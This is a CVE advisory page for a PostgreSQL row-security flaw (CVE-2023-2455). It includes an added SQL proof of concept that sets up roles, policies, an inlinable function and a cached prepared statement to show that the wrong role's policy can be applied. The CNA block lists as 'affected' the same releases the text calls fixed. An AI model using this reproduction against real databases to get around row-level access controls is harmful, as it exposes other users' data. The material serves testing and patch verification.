
CVE-2023-2455
Published: 2023-06-09 00:00:00
CWE-20
Source: redhat
Reference: www.cve.org
Tags: postgresql, security definer, create policy, role-specific policies, set role

AI Score: 6.6 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 40.4%)

Row security policies disregard user ID changes after inlining. PostgreSQL could apply incorrect policies in certain cases where role-specific policies are used and a query is planned under one role and then executed under other roles. This can happen under SECURITY DEFINER functions, or when a query is planned once under one user and the cached plan is then re-used across multiple SET ROLE changes. Applying an incorrect policy may permit a user to complete otherwise-forbidden reads and modifications. Only databases that have used CREATE POLICY to define a row security policy are affected.
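One way to check a server for the scenario the description names, as an added example that is not part of the advisory or of PostgreSQL's own code: two roles, role-specific CREATE POLICY rules on one table, a set-returning SQL function that the planner inlines into the calling query, and a prepared statement whose plan is reused across SET ROLE. All object names (alice, bob, rls_t, p_alice, p_bob, visible_secrets, q) are hypothetical. Releases 15.3, 14.8, 13.11, 12.15 and 11.20, the versions named in the CNA block below, are the first in each branch to carry the fix, so compare server_version_num before reading the result as a bug.

```sql
-- Constructed check for the scenario in the description above; added example,
-- not the advisory's or the PostgreSQL project's own code. All object names
-- are hypothetical. Run as a superuser in a scratch database.

-- 1. Fixed releases are 15.3, 14.8, 13.11, 12.15 and 11.20, i.e.
--    server_version_num >= 150003, 140008, 130011, 120015 or 110020.
SHOW server_version_num;

-- 2. Two roles with role-specific row security policies on one table.
CREATE ROLE alice NOLOGIN;
CREATE ROLE bob   NOLOGIN;

CREATE TABLE rls_t (
    id     int  PRIMARY KEY,
    owner  text NOT NULL,
    secret text NOT NULL
);
INSERT INTO rls_t VALUES (1, 'alice', 'alice-only'), (2, 'bob', 'bob-only');
GRANT SELECT ON rls_t TO alice, bob;
ALTER TABLE rls_t ENABLE ROW LEVEL SECURITY;

-- Each role may read only its own rows; no policy covers anyone else,
-- so any other non-owner role sees nothing.
CREATE POLICY p_alice ON rls_t FOR SELECT TO alice USING (owner = 'alice');
CREATE POLICY p_bob   ON rls_t FOR SELECT TO bob   USING (owner = 'bob');

-- 3. A set-returning SQL-language function over the protected table, written
--    so the planner can inline it into the calling query: LANGUAGE sql,
--    single SELECT body, STABLE (not VOLATILE), not STRICT,
--    not SECURITY DEFINER, no SET clause.
CREATE FUNCTION visible_secrets() RETURNS SETOF text
    LANGUAGE sql STABLE
AS $$ SELECT secret FROM rls_t ORDER BY id $$;
GRANT EXECUTE ON FUNCTION visible_secrets() TO alice, bob;

-- 4. Plan once, then execute the cached plan under two different roles.
--    The statement has no parameters, so the server caches a generic plan
--    and reuses it on every EXECUTE.
PREPARE q AS SELECT * FROM visible_secrets();

SET ROLE alice;
EXECUTE q;      -- patched server: exactly one row, 'alice-only'

SET ROLE bob;
EXECUTE q;      -- patched server: exactly one row, 'bob-only'
                -- an unpatched server may still apply alice's policy here and
                -- return the wrong row, the behaviour the description calls out

RESET ROLE;

-- 5. Cleanup.
DEALLOCATE q;
DROP FUNCTION visible_secrets();
DROP TABLE rls_t;
DROP ROLE alice, bob;
```

Superusers and table owners bypass row security, so the two EXECUTE calls must run after SET ROLE to a non-owner role, as above. The first EXECUTE builds the plan with alice's policy inlined; a fixed server records that the plan depends on the executing role and replans when the role changes, which is why the second EXECUTE must return only bob's row.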

CNA Affected

[
  {
    "vendor": "n/a",
    "product": "postgresql",
    "versions": [
      {
        "version": "PostgreSQL 15.3, PostgreSQL 14.8, PostgreSQL 13.11, PostgreSQL 12.15, PostgreSQL 11.20",
        "status": "affected"
      }
    ]
  }
]